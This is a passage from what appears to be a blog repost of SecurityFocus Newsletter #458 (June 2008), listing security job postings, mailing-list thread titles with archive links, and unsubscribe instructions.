22. [SJ-JOB] Sales Engineer, St. Paul
http://www.securityfocus.com/archive/77/493403

23. [SJ-JOB] Sr. Product Manager, San Jose
http://www.securityfocus.com/archive/77/493396

24. [SJ-JOB] Sr. Product Manager, Washington
http://www.securityfocus.com/archive/77/493397

V. INCIDENTS LIST SUMMARY
---------------------------
VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. default for requiring authentication 2003
http://www.securityfocus.com/archive/88/493298

VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
1. Vulnerability and Patch-Management in Linux (and other Unix)
http://www.securityfocus.com/archive/91/493478

X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe@securityfocus.com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@securityfocus.com and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Black Hat USA:

News

Friday, June 20, 2008

SecurityFocus Newsletter #458

No comments:

WINDOWS CENTER

Blog Archive